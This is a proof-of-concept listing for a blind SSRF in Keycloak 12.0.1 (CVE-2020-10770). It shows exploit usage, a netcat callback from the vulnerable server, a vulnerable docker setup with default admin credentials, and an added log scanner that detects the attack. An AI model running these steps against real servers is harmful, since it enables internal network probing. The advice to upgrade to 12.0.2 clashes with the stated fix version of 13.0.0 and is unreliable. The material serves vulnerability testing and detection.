
CVE-2020-10770 PoC — Red Hat Keycloak Code Issue Vulnerability

Source
Associated Vulnerability
Title: Red Hat Keycloak Code Issue Vulnerability (CVE-2020-10770)
Description: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out to an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-Side Request Forgery (SSRF) attack.
Description
Keycloak 12.0.1 - 'request_uri' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
Readme
# Keycloak-12.0.1-CVE-2020-10770

> Keycloak 12.0.1 - 'request_uri' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)

[Exploit-DB-50405](https://www.exploit-db.com/exploits/50405)

Expected outcome: port scan of localhost or internally accessible hosts via the server-side callback.

Intended only for educational purposes and for testing in corporate environments.

This exploit was tested on Python 3.8.6.

Vulnerable application:

```shell
docker run -p 9990:9990 -p 8080:8080 -e KEYCLOAK_USER=admin -e KEYCLOAK_PASSWORD=admin jboss/keycloak:12.0.1
```
### Usage:

```shell
cfx:  ~/keycloak
→ python3 exploit.py -h
usage: exploit.py [-h] [-u URL]

-=[Keycloak Blind SSRF test by ColdFusionX]=-

optional arguments:
  -h, --help         show this help message and exit
  -u URL, --url URL  Keycloak Target URL (Example: http://127.0.0.1:8080)

Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444
```

### POC:

- Scenario 1: Non Vulnerable Target

```shell
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:4444

[-] Invalid URL or Target not Vulnerable
```

- Scenario 2: Vulnerable Target

```shell
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:9994

[+] BINGO! Check Netcat listener for HTTP callback :)

```

HTTP Callback on nc listener:

```shell
cfx:  ~/keycloak
→ nc -lvnp 9994
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9994
Ncat: Listening on 0.0.0.0:9994
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:36866.
GET / HTTP/1.1
Host: 192.168.0.1:9994
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.9.1)
Accept-Encoding: gzip,deflate
```
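As an added defensive illustration (not part of the original PoC or of the Keycloak project), the following Python scans reverse-proxy access-log lines for OIDC authorization requests whose `request_uri` points at a loopback, private, link-local or otherwise non-allowlisted host, which is the pattern the callback above would leave behind. The log lines and the allowlist are constructed assumptions.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original page): a proxy in
# front of Keycloak logging the request line. Only the path/query field matters.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=account&response_type=code&request_uri=http%3A%2F%2F127.0.0.1%3A9990%2F HTTP/1.1" 400 -
10.0.0.6 - - [01/Jan/2021:10:00:01 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=account&response_type=code&request_uri=https%3A%2F%2Fidp.example.com%2Frequest.jwt HTTP/1.1" 302 -
10.0.0.7 - - [01/Jan/2021:10:00:02 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=account&response_type=code HTTP/1.1" 302 -
"""

# Hypothetical allowlist: hosts legitimately permitted to serve OIDC request objects.
ALLOWED_REQUEST_URI_HOSTS = {"idp.example.com"}

def request_uri_target(log_line):
    """Return the decoded request_uri value from an OIDC auth request, or None."""
    try:
        path = log_line.split('"')[1].split(" ")[1]
    except IndexError:
        return None
    if "/protocol/openid-connect/auth" not in path:
        return None
    values = parse_qs(urlsplit(path).query).get("request_uri")
    return values[0] if values else None   # parse_qs already percent-decodes

def is_suspicious(target):
    """True when request_uri points anywhere other than an allowlisted host."""
    host = urlsplit(target).hostname
    if host is None:
        return True
    if host in ALLOWED_REQUEST_URI_HOSTS:
        return False
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved
    except ValueError:
        return True   # any non-allowlisted hostname deserves review

def flag_ssrf_attempts(log_text):
    """Return (line_no, request_uri) for every suspicious authorization request."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        target = request_uri_target(line)
        if target and is_suspicious(target):
            hits.append((n, target))
    return hits

if __name__ == "__main__":
    for n, target in flag_ssrf_attempts(SAMPLE_LOG):
        print(f"line {n}: request_uri -> {target}")
```

Feeding the first sample line through `flag_ssrf_attempts` flags the loopback target on port 9990, the management port exposed by the docker command above.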

### Solution

Upgrade to Keycloak 12.0.2 or a later version.

### Reference

- https://bugzilla.redhat.com/show_bug.cgi?id=1846270
- https://nvd.nist.gov/vuln/detail/CVE-2020-10770
File Snapshot

```
[4.0K] /data/pocs/6ed813ba1cdfc33bf855985e721823dc69e39af9
├── [1.8K] exploit.py
├── [1.0K] LICENSE
└── [2.0K] README.md

0 directories, 3 files
```